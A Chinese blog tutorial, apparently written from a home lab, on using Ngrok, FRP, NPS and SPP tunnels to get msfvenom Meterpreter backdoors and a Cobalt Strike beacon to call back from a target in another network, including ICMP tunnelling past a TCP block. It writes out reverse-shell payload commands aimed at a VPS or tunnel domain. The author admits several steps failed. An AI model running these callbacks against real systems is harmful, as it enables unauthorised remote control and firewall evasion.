前言

主要介绍一下常见的隧道搭建工具，以此来达到一个内网穿透的目的。简单说一下实验滴环境吧，kali作为攻击机，winserver2016作为目标靶机。

kali 192.168.145.171
winserver2016 10.236.44.127

显然它们处于两个不同的局域网，此时要想通过msf来让winserver上线到kali是不可能滴。因为，kali处于另一个局域网内，winserver是找不到它的。那么此时我们就可以借助内网穿透工具，这个工具是处于公网中的，靶机是可以找到它的，然后这个工具再把流量转发到kali，不就可以实现上线了吗。有人可能会说，那我直接在vps安装一个msf不就行了吗。这个确实是可以，但是vps是要钱滴，而且你kaili那么多工具，你不可能全部都安装到vps上面吧。所以最终还是得利用内网穿透，来突破两个不同的局域网的限制，达到一个上线的目的。

Ngrok内网穿透

首先到官网注册一个账号。

地址：Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

点击开通隧道，购买一个服务器，直接买这个免费的就行了。

协议的话这个工具支持三种，http、https、tcp。注意你这里选择什么协议开通的隧道，后面生成后门的时候就要选择相对于的协议。下面填的是kali的ip以及端口，其它密码啥的就不用管啦。

开通成功，点击客户端下载。

选择相对应的系统下载就行。

客户端执行下面命令，后面这串数字就是你隧道的id。奇怪的事情又来了，执行命令之后什么的反应也没有，实验步骤我也没有错啊。

./sunny clientid 210543434570

而且我直接复制它这个命令也不行，唉难搞。有无大佬知道为啥的，还恳请指点一二，有偿答谢。

这里我就简单说一下假如成功该咋样操作，msf生成后门，这里lhost绑定的是隧道生成的域名，lport绑定的是80端口，因为这个Ngrok这个网站默认是80端口，注意你隧道是什么协议，后门生成就用什么协议。

msfvenom -p windows/x64/meterpreter/reverse_http lhost=test1.free.idcfengye.com lport=80 -f exe >/home/wlw666/桌面/hhh.exe

设置监听，监听端口是你生成隧道时填的端口，然后直接run即可。靶机上的后门先把流量发送到Ngrok服务端也就是网站，然后由于前面我们kail作为客户端已经和服务端建立连接，服务端就会把流量转发到我们的kali，实现上线msf。简单来说就是Ngrok服务端充当了一个在公网的中转站，让两个不同的局域网进行交流。

FRP内网穿透

FRP和Ngrok都差不多，只是它支持的协议要比Ngrok多好多，可以说是进阶款的工具。使用起来也是非常简单滴，同理也有客户端和服务端。当然啦，也分linux和windows版本，下载相对应的版本即可，这里我就不放链接了，因为我找不到了，实验环境还是差不多的。

vps 8.xxx.xxx.xxx
kali 192.168.145.171
靶机 10.236.2.204

顺便说一下，使用这个工具需要一台vps。Ngrok不需要vps是因为它网站本身充当了vps。把服务端以及配置文件上传到vps，也就是frps和frps.ini。服务端配置文件默认使用7000端口进行通讯。

启动客户端。

./frps

 接着把客户端和客户端配置文件放到kali上面，也就是frpc和frpc.ini。修改客户端配置文件，顺便说明一下参数。

[common]
server_addr = 8.xxx.xxx.xxxx  //服务端地址
server_port = 7000            //服务端通讯端口[test]
type = tcp                    //隧道协议
local_ip = 192.168.145.171    //kali的ip
local_port = 1111             //本地接收流量端口
remote_port = 2222            //服务端转发流量的端口

启动服务端。

./frpc -c frpc.ini

此时我们的vps和kali，通过frps和frpc建立了连接。访问8.xxx.xxx.xxx:2222的流量会通过我们建立的隧道转发到192.168.145.171:1111。使用msf生成一个后门，注意你上面设置的是什么隧道，我们就要生成什么协议的后门。

msfvenom -p windows/meterpreter/reverse_tcp lhost=8.xxx.xxx.xxx lport=2222 -f exe >/home/wlw666/桌面/hhh.exe

设置监听，监听地址是kali本地，端口自然也是1111。

放到靶机上面去运行，可以看到服务端显示有IP连接。

成功上线msf。

NPS内网穿透

这个NPS支持的协议就更多了，几乎支持所有常见的协议。使用方式和Ngrok差不多，Ngrok就是基于NPS开发的。同理也是有客户端和服务端，下载相对应的系统版本即可。实验环境和FRP的一样，就不再赘述了。

下载地址：Releases · ehang-io/nps (github.com)

服务端上传到vps，这里说一下服务端配置文件主要的参数，其它的不用管也行。

##bridge
bridge_type=tcp     //隧道协议
bridge_port=8024    //服务端与客户端连接的端口
bridge_ip=0.0.0.0#web
web_host=a.o.com
web_username=admin  //网站默认账号
web_password=1234   //网站默认密码
web_port = 8080     //网站默认访问端口
web_ip=0.0.0.0
web_base_url=
web_open_ssl=false
web_cert_file=conf/server.pem
web_key_file=conf/server.key
# if web under proxy use sub path. like http://host/nps need this.
#web_base_url=/nps

启动服务端。

网页访问一下，输入默认密码账号。

先新增一个客户端，备注随便弄个名字，其它密码啥的不用设置也行。

点击新建一个tcp隧道，客户id填我们刚刚创建的，备注随便，下面端口随便。2222是我们服务端接收流量的端口，1111是流量要转发到的端口。

客户端拖到kali上面，输入命令进行安装。

./nps install

说一下客户端配置文件主要参数。

[common]
server_addr=8.xxx.xxx.xxx:8024 //vps地址，端口要和服务端的一样
conn_type=tcp   //协议要和服务端一样
vkey=123456     //不用管

启动客户端，这个vkey就是你创建的客户端的唯一验证密钥。

./npc -server=8.xxx.xxx.xxx:8024 -vkey=sndudbk16evol2gv -type=tcp

msf生成后门，绑定的是vps的地址也就是服务端，端口是2222而不是1111。后门连接到vps的2222端口，然后转发到客户端也就是kaili的1111端口。

msfvenom -p windows/meterpreter/reverse_tcp lhost=8.xxx.xxx.xxx lport=2222 -f exe >/home/wlw666/桌面/1111.exe

设置监听，然后直接run。

后门放到windows上面运行即可上线msf。

SPP内网穿透

这个工具集成了穿透和隧道两个功能，既可以用来进行内网穿透也可以搭建隧道。如果在实战中遇到比较极端的环境，比如把tcp还有其它的协议封杀干净了，就可以用这个工具。

支持的协议：
TCP、UDP、RUDP（可靠 UDP）、RICMP（可靠 ICMP）、RHTTP（可靠 HTTP）、KCP、Quic
支持类型：
正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合

这里这个工具主要是演示一下隧道的搭建，这里windows靶机出站和入站我都封杀了tcp，演示一下icmp上线，实验环境依旧不变。

这个也是分客户端和服务端的，只不过它的客户端和服务端都是同一个文件。下载相对应的系统版本即可。

 工具下载地址：Releases · esrrhs/spp (github.com)

这个工具也需要vps才行，因为不像Ngrok有网站来充当vps。启动服务端，监听本地icmp数据。

./spp -type server -proto ricmp -listen 0.0.0.0  ##这里设置监听ICMP协议，全端口

靶机是Windows，所以还得下载一个Windows版本的spp充当客户端。靶机执行命令，但是奇怪的事情又来了，命令执行后一直报错。一直说无法连接到服务端？？？但是我服务端是放在公网的vps的，而且ping也能ping通。我真的想骂人了。各种奇奇怪怪的问题都能遇见，真的烦啊。

把本地1111端口的tcp流量，封装成icmp然后转发到服务端的2222端口spp.exe -name "test" -type proxy_client -server 服务端ip -fromaddr :1111 -toaddr :2222 -proxyproto tcp -proto ricmp

我又把服务端放到与靶机同一局域网的kali，居然又能连接上了，那为什么连不是vps的服务端，真的是cnmb。

这里我就当可以连接上vps的服务端了，然后说一下如何上线CS。生成两个监听器，一个监听服务端的222端口，一个监听本地的1111端口。

用app-2生成一个后门放到靶机上面运行，成功上线之后。你会发现上线用的监听器是spp-1，而不是生成后门的spp-2。这是因为如果我们直接用spp-1生成后门的话，它流量是出不来的，因为我们封杀的tcp嘛。spp-2生成后门的话它的流量只会在原地转圈，因为连接地址为127.0.0.1。再通过SPP把流量封装好，转发到服务端的2222端口，此时我们的spp-1监听的是服务端，自然是spp-1上线咯。

总结

这个实验我没有做成功，老是遇到一些奇奇怪怪的问题，烦死了。如若有师傅了解，还恳请指点一二，有偿答谢。

最后，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。